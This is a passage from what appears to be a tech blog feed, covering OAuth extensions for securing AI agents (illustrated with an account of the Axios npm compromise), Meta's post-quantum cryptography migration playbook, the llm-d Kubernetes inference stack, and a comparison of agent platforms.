The lesson for architects: an MCP server is unverified code from an unknown publisher. Treat it the way you'd treat a browser extension asking for "read all your data on all websites." The answer is not faster review. The answer is isolation — MCP servers run in their own sandbox with their own scoped credentials, and their tool invocations are mediated by a policy engine the agent cannot bypass.

The Axios war story — what OAuth would have prevented

Let me walk the Axios timeline again, this time annotating what a properly-designed agent identity stack would have caught.

Early March. UNC1069 begins open-source recon. They identify the Axios maintainer, map his LinkedIn and GitHub graph, and build personas matching real contacts. OAuth caught nothing — this is social engineering, not credential theft. But a well-tuned ITDR system ingesting LinkedIn telemetry could have flagged the anomalous new connection pattern.

March 15-25. AI-generated deepfake video calls. A Slack workspace cloned pixel-for-pixel. A fake LinkedIn profile with a matching photo. Still no credential event. But note: every one of these attacks used identity signals (Slack tenant, LinkedIn profile, Zoom account) that a unified ITDR platform could correlate.

March 29. The maintainer's device is compromised through a social channel. A browser session token for npm's publishing API is harvested from local storage. This is the moment OAuth broke. The session token was bearer-semantic — possession equals authority. MFA was theater because MFA had already happened at login; the token was minted post-MFA and had hours of lifetime remaining.

March 31. UNC1069 publishes axios@1.14.1 and axios@0.30.4 using the stolen token. npm's registry had no contextual check: new publish from a new IP, new user-agent, new geography, outside the maintainer's usual publishing cadence. With CAEP signals wired into npm's identity provider, the session could have been revoked at the first anomalous publish. Instead, the token was accepted because it was structurally valid.

April 1. Microsoft Threat Intelligence attributes the compromise to UNC1069. 150M weekly downloads already exposed.

Three OAuth extensions would have changed the outcome:

DPoP (RFC 9449) would have bound the session token to a key in the maintainer's browser. The harvested bearer token, lifted out of storage, would have been useless without the accompanying private key.
CAEP would have let npm's IdP push a revocation when Microsoft's EDR flagged the device as compromised on March 29 — two days before the malicious publish.
Token Exchange with short TTLs would have forced the publish operation to derive a short-lived, operation-scoped token, reducing the window of exploitability from "bearer token valid for hours" to "publish-scoped token valid for 30 seconds."

The broader point: MFA protects the login. It does not protect what happens after. Every identity layer that treats a session token as the end state is running the same risk Axios did. And agents, which by definition operate post-login for hours at a time, live entirely in that risk zone.

The six extensions agents demand

OAuth2 is not dead. But agents need six extensions layered on top of it before the protocol is usable at machine speed.

On-Behalf-Of (OBO). Originally a Microsoft extension, now widely supported. Lets a service exchange an incoming user token for a downstream token that preserves user context. Without OBO, an agent either impersonates the user (no audit trail) or acts as itself (loses user context). OBO is the minimum viable primitive for any agent that acts for a human.

Token Exchange (RFC 8693). The standardized, IdP-agnostic version of OBO, plus more. Supports subject_token + actor_token chains, so a multi-hop agent call preserves the full delegation chain. This is the spine of agent-to-agent delegation — every non-trivial agent architecture needs RFC 8693.

DPoP (RFC 9449). Demonstrating Proof-of-Possession. Binds a token to a key pair the client generates. Every request carries a signed proof. Stolen tokens become useless without the private key. If you adopt one thing from this list, adopt DPoP — it's the direct fix for the Axios class of attack.

PKCE (RFC 7636). Proof Key for Code Exchange. Mandatory for public clients (including agents running on user devices). Prevents authorization code interception. Already standard for mobile apps; must be standard for agents.

CAEP (OpenID Continuous Access Evaluation Profile). The revocation channel. IdP pushes signals — credential change, session revoked, device compromised, user disabled — to relying parties in real time. Without CAEP, token revocation is on the token-lifetime clock, which for agents is forever.

ABAC (Attribute-Based Access Control). Not a single spec but a category. Replaces coarse OAuth scopes with context-aware policy: agent identity + user identity + resource attributes + environmental attributes. OPA, Cedar, and Hexa are the open-source anchors. Without ABAC, you're back to the scope-string problem — an agent with write:files can write any file, forever.

Together these six don't replace OAuth; they rebuild OAuth into something appropriate for a world where identity traverses machines.

Trade-offs analysis

The core tension is token lifetime, and it resolves to a three-tier model — not a single answer.

Long-lived tokens (24h-7d) are tempting. Your agent grabs a token and runs. No refresh logic, no per-call latency. Operationally trivial. Axios is the counter-argument: one leaked token and the attacker has hours of authorized action. For any agent touching production, 24-hour tokens are indefensible.

Short-lived tokens (seconds-to-minutes) align with best practice. CAEP revocation actually works because the token rotates constantly. DPoP binding is cheap because the handshake is amortized across many requests. But two costs are real. First, IdP load — an agent making 10k requests/sec with 10-second tokens is issuing 1000 token exchanges per second. Your IdP needs to scale like a CDN. Second, latency — every hop adds a token exchange round-trip. For latency-sensitive agent chains (voice agents, trading agents), this shows up as user-visible lag.

The emerging consensus is tiered. Human-initiated actions get 5-60 minute tokens — the human is present, the session is interactive, rotation is a background concern. Agent-to-agent hops in a hot path get milliseconds-to-seconds lifetimes with DPoP binding — rotation is the point, revocation is instant, latency is managed through connection reuse. Background batch jobs get a third pattern: single-purpose, narrowly scoped, operation-bound tokens issued per task and discarded on completion.

Trust rings is the architectural frame. Think of your agent fleet as concentric rings. Inner ring: agents running inside your VPC, talking to your services. Tokens here can be slightly longer (minutes), DPoP-bound, with ABAC enforcement at the service mesh. Outer ring: agents calling third-party MCP servers or SaaS APIs. Tokens here are seconds-long, scoped to exactly one operation, and revoked on completion. The rings are not static — an agent can step from inner to outer mid-task, and the token regime changes with it.

Implementation insights

If you're architecting this today, three patterns are proving out in production.

Pattern 1 — Scoped carve-outs at the MCP boundary. Don't let agents call MCP servers with long-lived tokens. Insert a policy broker that receives the agent's intent, issues a single-purpose token bound to the specific tool invocation, and revokes it the moment the tool returns. Teams doing this report MCP-server blast radius dropping from "everything the agent can do" to "the one operation this call authorized."

Pattern 2 — Audit breadcrumbs via Token Exchange chains. When agent A exchanges its token for a downstream call to agent B, the resulting token carries both subject_token (the original human) and actor_token (agent A). Logging the full chain at every hop gives you a reconstructable audit trail: "at 03:14:07, user X's intent was carried by planner Y and executed by tool Z on resource R." Without this, agent mesh logs are a puddle of service-account IDs.

Pattern 3 — CAEP-wired IdP with ITDR. Wire your IdP's CAEP signals to your ITDR (Identity Threat Detection & Response) platform and back. Anomaly in agent behavior → ITDR alert → CAEP revoke → all downstream tokens invalidated within seconds. Gartner-referenced data shows ITDR adoption correlates with a 70% reduction in identity-based attack success rates. The Axios-class compromise is exactly what ITDR exists to catch before it propagates.

Actionable takeaways for Q2 2026

Inventory every agent with identity access by May 1. You cannot govern what you cannot count. 91% of enterprises have agents; 10% know where they are. Start with IdP logs filtered by non-human user agents.
Enable CAEP on your primary IdP this quarter. Okta, Entra, and Auth0 all ship it. The integration work is small; the revocation-latency reduction is enormous.
Migrate every agent-to-service call to RFC 8693 Token Exchange. No more client_credentials shortcuts. The audit chain is the payoff.
Ship DPoP on at least one high-value agent path. Start with the path that would cause the biggest Axios-shaped headline if compromised. Bind the tokens. Prove the flow.
Deploy ITDR and connect it to CAEP. Make the revocation loop closed and automatic. Humans cannot revoke at agent speed.

Meta's Post-Quantum Crypto Migration Playbook

Anil Kurmi — Sun, 19 Apr 2026 08:26:13 +0000

Picture a Meta security engineer on April 15, 2026, sitting on a Slack thread with the TLS team. The draft blog post is ready for legal review. Someone asks the question everyone is avoiding: "Can we say what percentage of traffic is actually PQ-protected?" Silence. Then: "Let's just say 'significant portions of our internal traffic.' Ship it."

That hedge made it into the published post on April 16. For the world's second-largest CDN, "significant" is a word you pick when the real number is either embarrassingly small or operationally terrifying to disclose. Either way, the vagueness is the signal. Post-quantum cryptography migration is harder in production than any vendor slide deck admits, and Meta just published the most honest playbook we have.

I read the whole thing twice. Here is what it actually says, what it refuses to say, and what you should do about it before your CNSA 2.0 deadline crashes into you in nine months.

5-Minute Skim: What changed this week?

Meta published a real migration framework on April 16, 2026. Six steps, specific algorithm recommendations, and a refreshingly honest threat model. Not marketing — a playbook.
Default recommendation: hybrid, not pure-PQ. ML-KEM768 for key exchange paired with X25519. ML-DSA65 for signatures paired with ECDSA. HQC as a hedge.
What breaks in production: middleboxes that can't handle a 1,184-byte ClientHello extension, CAs that don't yet issue hybrid certs at scale, and firmware that ships with pinned classical verifiers.
Key trade-off: hybrid doubles your handshake surface area but keeps you safe if either ML-KEM or X25519 falls. Pure-PQ is lighter but puts all your faith in lattice math that is barely five years into peer review.
Bottom line: If you have not started your PQC inventory, the CNSA 2.0 deadline (January 1, 2027) is already inside your planning horizon.

Why does this week matter for PQC?

Three things converged between April 13 and 19.

First, Meta broke its silence. Until now, the big PQC voices were Cloudflare, Google, and AWS — companies whose threat models are public and whose customers demand transparency. Meta's internal traffic is a black box. When they publish a framework, they are signaling that the migration has moved past the "interesting research" phase into "we are burning real engineering quarters on this."

Second, CNSA 2.0's January 1, 2027 deadline is nine months away. That is the US government's Commercial National Security Algorithm Suite 2.0 requirement, and it cascades. If you sell to federal agencies, you need PQC. If you sell to companies who sell to federal agencies, you need PQC. If you process data that might touch a regulated industry, your auditors are going to start asking about PQC readiness this year.

Third, the industry wave is visible now. Cloudflare reported 16% of human requests PQC-protected back in 2024 and is ramping to majority share. Akamai flipped the default to hybrid ML-KEM+X25519 for all customers in February 2026. AWS's s2n-tls has production PQ key exchange. Microsoft shipped PQC APIs GA on Windows Server 2025, Windows 11, and .NET 10. Google's Android 17 stable release in June 2026 will carry ML-DSA in the boot chain. Everyone is on the same clock.

What did Meta actually choose?

Meta's framework rejects pure-PQ and commits hard to hybrid. That choice deserves unpacking because it is the single most consequential architectural decision in the post.

For key exchange: ML-KEM768 wrapped with X25519. Both run in parallel during the TLS handshake. The session key is derived from both shared secrets, so an attacker has to break both schemes to decrypt the traffic. ML-KEM (formerly Kyber) is the NIST FIPS 203 standard; it is a lattice-based key encapsulation mechanism whose security rests on the hardness of the Module Learning With Errors problem.

For signatures: ML-DSA65 (FIPS 204) paired with ECDSA. Same logic — a forger needs to break both. ML-DSA is another lattice construction, and while signatures are less urgent than KEX for "harvest now, decrypt later" attacks, they matter enormously for firmware and supply-chain trust.

As an algorithmic hedge: HQC (Hamming Quasi-Cyclic). This is code-based, not lattice-based. Meta explicitly flags that if some clever cryptanalyst finds a structural weakness in Module-LWE over the next decade, the entire lattice family collapses together. HQC uses completely different math, so it is insurance against a category-level break.

Size guidance: stick with the 768/65 variants unless performance forces you smaller. The 512-bit variants exist for embedded and constrained devices, but on general-purpose servers the ~2.5% handshake overhead is worth the extra margin.

The important detail is the parallel derivation. Both shared secrets feed a key derivation function, and the output is the session key. An attacker with a future quantum computer can crack X25519 but still faces ML-KEM. An attacker with a lattice-cryptanalysis breakthrough cracks ML-KEM but still faces X25519. You fail only if both fall, which is the whole point of defense in depth.

What is the operational reality nobody wants to discuss?

Here is where Meta's framework gets honest and where your production rollout is going to bleed.

Middlebox intolerance is the silent killer. Adding ML-KEM public keys to the ClientHello balloons the extension by roughly 1,184 bytes. That pushes the ClientHello past the first TLS record boundary, forcing fragmentation. Corporate firewalls, load balancers, and "next-gen" inspection appliances from 2015-2019 often drop or mangle fragmented ClientHellos. Cloudflare spent five years (2019-2024) ramping PQC incrementally precisely because of this. They documented cases where a single misbehaving middlebox would break 2-3% of a customer's traffic in ways that looked like random TLS errors. You cannot fix this centrally. You have to detect, attribute, and either upgrade the middlebox or carve out a fallback path.

Performance degrades sharply under packet loss. In ideal network conditions, the extra bytes cost you under 2.5% of handshake time and somewhere between 5-15% of page load time. On a clean fiber link you will barely notice. But under 3% packet loss, the larger handshake means more retransmissions, and latency balloons to 32% over the classical baseline. Mobile users on congested cell networks are going to feel this. Your p99 is going to look worse before it looks the same.

The CA bottleneck is real. Public CAs are understaffed for hybrid certificate issuance. AWS Certificate Manager opened hybrid support in 2025 and discovered that legacy validators silently failed on the dual-signature certificate chain. The chain parses, but the second signature is ignored, so you think you have PQC protection when you don't. Hybrid cert issuance windows are opening at major public CAs in Q3 2026, but availability at scale will lag into 2027. If your application depends on client certs or mTLS, plan for a long tail.

Firmware is the worst deployment target. Google's Android 17 rollout for ML-DSA in bootloader validation required 12-18 months of OEM coordination even with a single company driving the schedule. Every handset SoC has its own secure boot chain. ROM-baked classical verifiers cannot be patched. If your product ships with long-lived firmware — IoT, automotive, industrial — you are looking at multi-year lead times, and anything already shipped is effectively stuck on classical signatures until hardware refresh.

Is the harvest-now-decrypt-later threat actually real?

Yes, and this is the slide your CISO needs to show the board.

The threat model is simple. An adversary records encrypted traffic today. They store it cheaply — at a few cents per gigabyte, even nation-state-scale capture is operationally feasible. They wait. When a cryptographically relevant quantum computer comes online, they decrypt retroactively. Your TLS key exchange from 2026 is readable in 2035 or 2040.

This is not a speculative framing anymore. The US Department of Homeland Security, the UK's NCSC, the EU's ENISA, and the Australian Cyber Security Centre have all published guidance that treats harvest-now-decrypt-later as a documented, active risk. HashiCorp's write-up frames it clearly: you are not protecting against tomorrow's interception, you are protecting yesterday's already-captured traffic that has a decade or more of shelf life.

Which data actually matters?

Intellectual property that retains value for 10+ years: pharmaceutical research, unreleased product designs, trade secrets.
Diplomatic and intelligence communications with effectively infinite sensitivity.
Healthcare records that are protected under HIPAA for the patient's lifetime.
Financial and legal data with 7-30 year retention requirements.
Personally identifiable information that will embarrass you on tomorrow's front page regardless of when it was captured.

Insurers are pricing this now. Several cyber-insurance carriers have started requiring PQC roadmaps as part of underwriting renewals in 2026. Regulators — especially in financial services and healthcare — are treating absence of a migration plan as failure to meet the reasonable standard of care. If you get breached in 2030 and your 2026 traffic is decrypted, "we hadn't gotten to PQC yet" will not hold up in litigation.

Hybrid versus pure-PQ: which side wins?

This is the live debate inside every security team, so let me lay out the argument honestly.

The pure-PQ camp says hybrid is a transitional crutch. Lattice cryptography has been studied for three decades. ML-KEM went through multiple rounds of NIST competition with hundreds of cryptanalysts hammering at it. Every year you run hybrid, you pay double — double the handshake bytes, double the CPU, double the code to maintain. If you trust the standardization process, commit and move on.

The hybrid camp — which includes Meta, Cloudflare, Akamai, AWS, and basically everyone running production at scale — says the lesson of cryptographic history is humility. RSA looked bulletproof in 1994. SHA-1 was safe until it wasn't. Lattice crypto at production scale is new. Five years of serious deployment scrutiny is not enough. The extra bytes and CPU are cheap insurance. And critically, hybrid lets you fail safe if either family is broken, rather than fail catastrophically if the one you bet on is broken.

My read: hybrid wins for the next five to seven years, then the argument flips. Once ML-KEM and ML-DSA have a decade of adversarial review behind them and no structural weakness has emerged, dropping the classical side becomes defensible. Until then, hybrid is the correct default.

One more point the pure-PQ camp underweights: algorithm agility matters more than algorithm choice. Whatever you deploy in 2026 should be swappable via configuration, not a code change. If HQC needs to replace ML-KEM in 2032 because somebody publishes a Module-LWE break, you want that to be a config push, not a six-month engineering project.

What are the implementation gotchas?

Meta's six-step framework is: Prioritize → Inventory → External deps → Implement → Guardrails → Integrate. Each step has a trap.

Prioritize by data shelf life, not by traffic volume. The chatty internal telemetry service that carries gigabits of ephemeral metrics is lower priority than the boring admin API that handles customer PII with 7-year retention.

Inventory is where most teams discover they do not actually know what crypto runs where. Every TLS endpoint, every signed artifact, every encrypted field in a database, every JWT-signing service, every mutual-TLS service mesh. Build the asset graph before you write a line of migration code. Meta's framework spends real time on this for a reason.

External dependencies are the scary part. You control your own services. You do not control the SaaS vendors, payment processors, identity providers, and partner APIs in your dependency graph. Start the vendor PQC roadmap conversation now. Many will not have answers, and that is itself useful signal about which partners are serious.

Implement with hybrid from day one. Do not deploy classical-only into a system you plan to PQC later — you will end up doing the migration twice.

Guardrails means feature flags, gradual rollout, and the ability to instantly disable PQ if middlebox incompatibility surfaces. Cloudflare's five-year ramp worked because they had per-customer, per-edge-location toggles.

Integrate PQC into the normal SDLC so new services are born PQ-native. Otherwise you are signing up for a perpetual migration.

Anti-patterns I am seeing:

Treating PQC as "a TLS thing." It is also a signature thing, a long-lived-key thing, and a firmware thing. TLS is just the loudest.
Waiting for "the standard to settle." ML-KEM and ML-DSA are standardized. The waiting game is done.
Deploying pure-PQ for performance reasons without accepting the risk. If perf is that tight, fix the perf path, don't drop the hybrid protection.
Ignoring the deployment order. TLS endpoints first (fast to roll out, high value for HNDL defense), then long-lived data encryption keys (medium complexity, enormous value), then signatures (slowest, requires firmware and PKI coordination).

What should you actually do this quarter?

Five concrete actions for the next 90 days:

Run the crypto inventory. Every TLS endpoint, every signing service, every long-lived encrypted data store. If your team cannot produce this list in a week, that gap is your first finding.
Pick your algorithm pair. Default to ML-KEM768 + X25519 for key exchange and ML-DSA65 + ECDSA for signatures. Document the decision and the hedge plan (HQC) in an ADR.
Audit your middleboxes. Run synthetic ClientHello traffic with PQ extensions through every load balancer, firewall, WAF, and inspection appliance in your path. Log every failure. This is the #1 thing that will break your rollout.
Start the vendor conversation. Email every critical SaaS and infrastructure vendor asking for their PQC roadmap and target hybrid-cert support date. The non-responders become your risk register.
Write the board-level HNDL brief. One page. What data has 10+ year shelf life, what the threat model is, what the CNSA 2.0 deadline means for the business, and what your 2026-2027 investment is. Get the budget conversation started now, because you will need it.

LLM-D Launches: Kubernetes-Native Distributed Inference

Anil Kurmi — Sun, 19 Apr 2026 08:25:24 +0000

It's Tuesday afternoon. An SRE at a mid-sized fintech is staring at a P90 latency dashboard that just flipped from a calm 0.5 seconds to an ugly 8 seconds. Same GPU fleet. Same model. No traffic spike. Every pod shows 40% utilization. The on-call channel is a blizzard of "rolling back?" messages.

The actual bug: customer A's 6,000-token system prompt was sitting warm in HBM. Customer B arrived, the scheduler promoted B's prefix into HBM, and A's cache got evicted down to DRAM. The next time A came back, the router — blind to where A's prefix had actually gone — sent the request to a pod that now had to pull the prefix from a slower tier. P90 went 16× off a cliff while the capacity graph stayed flat.

This is the "cache partition cascade." It's the exact bug the llm-d project, announced this week as a CNCF Sandbox project, is built to eliminate. And it's the reason your token bill is about to flip 180° — if you understand it.

5-Minute Skim

What changed: llm-d — a Kubernetes-native distributed inference stack — landed in the CNCF Sandbox backed by Google Cloud, Red Hat, IBM, NVIDIA, CoreWeave, AMD, Cisco, Hugging Face, Intel, Lambda, and Mistral AI. The v0.5 release validated 3.1k tokens/sec per B200 on decode and 50k tokens/sec on a 16×16 B200 topology.

Default recommendation: If you run self-hosted vLLM at scale and your workloads share long prefixes (support bots, ads ranking, legal Q&A, agents), adopt llm-d. If you do one-shot inference with unique prompts, stay on vanilla vLLM — the disaggregation overhead won't pay for itself.

What breaks: The naive "one-pod-per-replica" vLLM deployment. Cache-hit economics completely dominate; if you aren't measuring prefix-cache hit rate per tenant, you are flying blind. Also breaks: any mental model where "more GPUs = lower latency." llm-d showed a 57× TTFT improvement with the same 16 H100s.

Key trade-off: llm-d gives you 25-70% higher throughput and 10× cheaper cached tokens ($0.30 vs $3.00 per million) — but you inherit a scheduler, a multi-tier KV cache, and a transport layer (NIXL/UCCL) you now have to operate. Managed services like Bedrock hide all of that; you pay for the hiding.

Why did this hit the wires this week?

Two things converged. First, llm-d formally entered the CNCF Sandbox on April 13 with a coalition that spans every major compute supplier — hyperscalers, chip vendors, neocloud operators, model labs. That's unusual. Kubernetes itself didn't launch with that kind of cross-vendor consensus.

Second, the economic pressure became impossible to ignore. Meta published two pieces this week — "Capacity Efficiency at Meta" on April 16 and "KernelEvolve" on April 2 — describing AI agents that claw back hundreds of megawatts of capacity from existing fleets through automated infrastructure optimization. KernelEvolve alone reported a 60% throughput gain on the Andromeda ads model. When Meta's own ML infrastructure team is sending agents to rewrite CUDA kernels, the industry message is clear: inference is now a capacity-efficiency problem, not a model-quality problem.

AMD's MLPerf 6.0 results dropped in the same window — the MI355X posted 1.08-1.2× uplift, and for the first time competitive inference numbers exist outside the NVIDIA stack. A Kubernetes-native, hardware-neutral control plane suddenly has much bigger stakes.

What does llm-d actually do?

Three moves, each non-obvious, each compounding.

Move one: disaggregate prefill from decode. A transformer inference request has two phases. Prefill processes the input prompt in parallel — it's compute-bound and loves fat GPUs. Decode generates tokens one at a time — it's memory-bandwidth-bound and wastes compute. Running them on the same pod means your decode phase starves a prefill-optimized GPU, or your prefill phase bottlenecks a decode-optimized one. llm-d splits them onto separate pools: prefill pods (typically 8) and decode pods (typically 16), connected via a high-speed transport.

Move two: multi-tier KV cache. Every token you generate needs the model's attention over every previous token — the "KV cache." For a 6K-token prompt, that cache is hundreds of megabytes per request. llm-d stores it across a hierarchy: HBM (fastest, scarcest) → DRAM (10× cheaper, 5× slower) → NVMe (100× cheaper, 50× slower) → distributed storage. The NIXL protocol moves cache blocks between tiers on demand. Cache hits in HBM cost you $0.30 per million tokens. Misses that fetch from cold storage cost $3.00. Same model, same request — 10× cost delta driven entirely by where the prefix lives.

Move three: scheduler-aware routing via Kubernetes Gateway API. The scheduler doesn't just know which pod is healthy. It knows which pod holds which prefix in which tier. When a request arrives with a known prefix, it routes to the pod that already has the KV cache warm. When no pod does, it routes to minimize transfer cost. The Gateway API integration means this is a first-class Kubernetes concept, not a sidecar hack.

Underneath, llm-d still runs vLLM — PagedAttention, continuous batching, OpenAI-compatible API. It's not a replacement. It's the control plane vLLM always needed.

Five nodes, one story: the gateway sees the request, picks a prefill pod with (or near) the warm cache, hands the KV state to a decode pod over NIXL, and tiers inactive cache to cheaper memory. No node does two jobs.

What do real deployments look like?

Meta Capacity Efficiency (April 16). Meta deployed unified AI agents across its fleet that analyze traces, propose kernel rewrites, and re-partition workloads. The reported recovery: hundreds of megawatts. Not a model improvement — a scheduling and kernel-fusion improvement on existing silicon. This is the same philosophy llm-d exposes to the rest of us: the gains live in the scheduler and the memory hierarchy, not the chip.

Meta KernelEvolve (April 2). A "ranking engineer agent" that optimizes CUDA kernels for the Andromeda ads model. 60% throughput gain. Meta's takeaway: human engineers can't explore the kernel search space fast enough, and the kernels evolve faster than the model does. For llm-d users, the corollary is that you want a control plane that can swap kernels and routing rules without a redeploy. llm-d's Kubernetes-native design lets you do exactly that via CRD updates.

DeepSeek-V3 in production. Running on H200 with vLLM plus Wide-EP (wide expert parallelism), DeepSeek reported 2.2k tokens/sec per H200 and a 40% per-token latency reduction. The Wide-EP trick — spreading MoE experts across many GPUs — only works with a scheduler that understands which expert lives where. That is exactly what llm-d formalizes.

AWS disaggregated inference. AWS published a post on April 15 introducing disaggregated inference on EKS powered by llm-d. Same primitives, different cloud. The coalition is real.

The Cache Partition Cascade

Here's the war story in full, because the numbers matter.

An enterprise customer running llm-d v0.4 — pre-fix — deployed 8 prefill pods and 16 decode pods on 16 H100s. Workload: multi-tenant customer support. Average context: 6K tokens of system prompt plus ~500 tokens of conversation history. Classic cache-hit workload.

Monday, 14:00. Customer A's 6K prefix fills HBM on prefill pod #3. TTFT for A: 540ms. Beautiful.

Monday, 14:12. Customer B arrives. B's prefix is different but similar in size. The scheduler, correctly, promotes B into HBM on pod #3 — B is active, A has gone quiet. A's KV cache is evicted down to DRAM.

Monday, 14:14. A sends a follow-up. Here's the bug: the scheduler routed A's follow-up to pod #3 because the prefix hash still pointed there. But pod #3 no longer had A's cache in HBM — it was two tiers down. The pod had to fetch the KV blocks back over NIXL, rebuild the attention state, and only then start decoding. TTFT for A's follow-up: 8.6 seconds. 16× degradation.

Meanwhile, the GPU utilization graph stayed at a comfortable 40%. The SLO breached. Capacity planning said everything was fine.

The v0.5 fix (shipped April 2026) does three things:

Cache-aware LoRA routing. The scheduler now tracks which tier holds each prefix, not just which pod.
Inline cost function. HBM hit beats DRAM hit beats miss-plus-fetch. The scheduler scores candidates on expected latency, not just locality.
UCCL-based transport HA. The NIXL fallback path no longer stalls when a peer pod is evicting; it fails over to a replica tier.

Post-fix, the same workload's P90 dropped to 620ms under identical tenant churn.

Lesson: in disaggregated inference, your scheduler's world-model of the cache is the system. Lie to it — or let it go stale — and no amount of GPU capacity saves you.

How does llm-d compare to Ray Serve, Modal, and Bedrock?

I've seen teams pick each. Here's how the debate actually runs.

llm-d vs Ray Serve. Ray Serve is a general-purpose Python serving framework — it can host anything callable. That generality is the cost. Ray has no native concept of prefill/decode split, no KV-cache tiering, no prefix-aware routing. You can build those on top, and plenty of teams have, but you're building the llm-d feature set by hand. If your workload is LLM-dominated, llm-d starts you 18 months ahead. If you're serving a zoo of ML models — rankers, embeddings, a few LLMs — Ray stays competitive because the LLM isn't the only customer.

llm-d vs Modal. Modal's pitch is per-second billing and zero ops. That's seductive until you realize inference traffic is rarely bursty enough to benefit. Customer support bots, ads serving, legal Q&A — these run a steady baseline 24/7. Modal's economics collapse above 50 concurrent users because you're paying a premium for elasticity you aren't using. Modal remains excellent for experimentation, nightly eval jobs, and genuinely bursty workloads (batch document processing, overnight agents). For steady-state production serving, llm-d on reserved capacity wins on pure $/token.

llm-d vs AWS Bedrock. Bedrock hides everything — no scheduler to tune, no KV cache to partition, no pods to patch. You pay a roughly 2-3× premium over self-hosted llm-d on equivalent hardware. For teams without a dedicated ML infra function, that premium is cheap. For teams burning >$100K/month on inference, llm-d pays back the ops cost in weeks. The split point is roughly where you'd hire a dedicated ML infra engineer anyway.

The honest answer: llm-d wins when (a) you have cache-reusable workloads, (b) you have the operational muscle to run Kubernetes plus a specialized control plane, and (c) your token volume makes the hiring math work. Below that threshold, managed services aren't stupid — they're correct.

When should you adopt, and when should you skip?

Adopt if:

Your prefix-cache hit rate (measure it today on vanilla vLLM) is above 30%. Support bots, ads, agents, and RAG systems routinely hit 60-80%.
Your average context is over 2K tokens. Cache tiering only earns its keep when the cached state is worth paging.
You run at least 8 GPUs in a single inference fleet. Below that, the disaggregation overhead dominates.
You already run Kubernetes in production. llm-d assumes you're fluent with CRDs, Gateway API, and pod-level networking.

Skip if:

Your workloads are one-shot — every prompt is unique. Cache tiering is dead weight; stick with vLLM's built-in scheduling.
You have fewer than 4 GPUs. The orchestration cost exceeds the throughput gain.
You don't have an on-call team that understands GPU memory hierarchies. When the cache cascade hits, you need someone who knows what NIXL is.
You're on pre-H100 hardware. The cache-tier bandwidth assumptions don't hold.

A middle path: run llm-d as a pilot on one workload — preferably your highest cache-hit workload — for a quarter before committing. v0.5 is stable, but the operational playbook is still being written in public.

Actionable takeaways

Measure prefix-cache hit rate per tenant this week. If you're on vLLM, this is a Prometheus scrape away. It's the single number that predicts your llm-d ROI.
Alert on cache-tier residency, not just GPU utilization. The cache cascade was invisible on GPU graphs. Build a dashboard for HBM/DRAM/NVMe occupancy and eviction rate.
Separate prefill and decode traffic in your load tests. If you test with a single request type, you'll miss the disaggregation economics entirely.
Budget for NVIDIA BlueField-4 (H2 2026). NVIDIA's CMX platform extends the cache hierarchy to 4 tiers with 5× sustained TPS on long-context agentic workloads. If your roadmap includes 100K+ context agents, plan the hardware refresh now.
Pilot llm-d on one high-cache-hit workload this quarter. Don't rip-and-replace. Prove the economics on one tenant, then expand.

Deep Dive Resources

Google Cloud: Enhancing vLLM for distributed inference with llm-d — The architectural overview with benchmark methodology.
llm-d on GitHub — Source, CRDs, and the v0.5 release notes with the cache-aware routing fix.
AWS: Disaggregated inference on AWS powered by llm-d — EKS deployment walkthrough.
Meta Engineering: Capacity Efficiency at Meta — The "hundreds of megawatts" story.
NVIDIA: BlueField-4 Inference Context Memory Storage — Where the 4-tier cache hierarchy is going in H2 2026.

Sources & Attribution

Google Cloud Blog, "Enhancing vLLM for distributed inference with llm-d," April 2026
Meta Engineering Blog, "Capacity Efficiency at Meta," April 16, 2026
Meta Engineering Blog, "KernelEvolve," April 2, 2026
AWS ML Blog, "Introducing disaggregated inference on AWS powered by llm-d," April 2026
NVIDIA Developer Blog, "Introducing NVIDIA BlueField-4," April 2026
llm-d GitHub repository, v0.5 release notes
MLPerf Inference 6.0 results, April 2026
DeepSeek-V3 production deployment reports, April 2026

The Great Agent Platform Consolidation: Why I'm Rethinking My $9 Side-Project Agent

Anil Kurmi — Sun, 19 Apr 2026 08:23:52 +0000

On Wednesday night I sat staring at two deploy buttons. One was my scrappy LangGraph agent running on a $9/month VPS — duct-taped together with Redis for memory, a homegrown sandbox I'd written three weekends ago, and a credentials file I still felt bad about. The other was Anthropic's new Managed Agents dashboard, asking me for $0.08 per runtime-hour. That's about $58/month if I left it on 24/7. Six times more expensive.

I pressed the managed one.

Not because I'd gone soft. Because I'd just finished writing a 400-line retry loop to handle a sandbox that kept OOMing on long tool calls, and Anthropic was offering to delete that file from my life. Three to six months of infrastructure work, gone. That's the pitch of the week, and it's working — but it comes with a trade none of the launch posts want to talk about.

This week — April 13-19, 2026 — wasn't just another product cycle. It was the week the agent platform wars turned into a platform consolidation. Three simultaneous launches, one new Linux Foundation project, and one quiet market share number that tells you who's actually winning.

The 5-Minute Skim

What changed this week: Anthropic launched Managed Agents (flat $0.08/runtime-hour, April 8). OpenAI updated its Agents SDK with sandbox execution, long-horizon tasks, and multi-provider support (April 15). The Agentic AI Foundation formalized under the Linux Foundation with Anthropic, OpenAI, and Block as founding members. Claude Opus 4.7 shipped the same week with advanced SWE capabilities.
The number nobody's quoting: OpenAI's share of enterprise LLM API spend has dropped from ~50% in 2023 to 27% in 2026. Market share is following openness, not coordination features. Anthropic gained by not building a walled garden.
Default recommendation: If you're a team of 1-5 shipping in under a quarter, use Anthropic's Managed Agents. If you're a platform team that already runs its own infra, use OpenAI's Agents SDK with BYO sandbox. Only pick LangGraph/CrewAI if you genuinely need graph-level control of the orchestration — most teams don't.
Failure mode to expect: Over-permissioned agents, credential sprawl, and skill-package supply-chain attacks (see: the "OpenClaw" incident below). State management fails first; observability fails second.
The trade-off: Managed platforms hide the hardest problems (state, credentials, governance) behind the "enterprise tier" bill. DIY forces you to solve them. There is no free option — you pay in dollars or you pay in on-call pages.

Why did three platforms ship agent runtimes in the same week?

This didn't happen by accident. The vendors have been watching the same graph: enterprise agent deployments went from demo toys in 2024 to real production workloads in 2025, and every one of them bled budget on infrastructure no one wanted to maintain. Teams were writing their own sandbox runners, their own memory stores, their own session replay — five times over, badly.

On April 8, Anthropic shipped Managed Agents as a public beta. The pitch is ruthless: $0.08 per runtime-hour, flat. No CPU tiers, no memory tiers, no per-tool-call charges. The harness — memory, sandbox, state persistence, session logs, tool orchestration — is all included. They claim it compresses three to six months of infra work into an afternoon, and having just spent three weekends on a sandbox, I believe them.

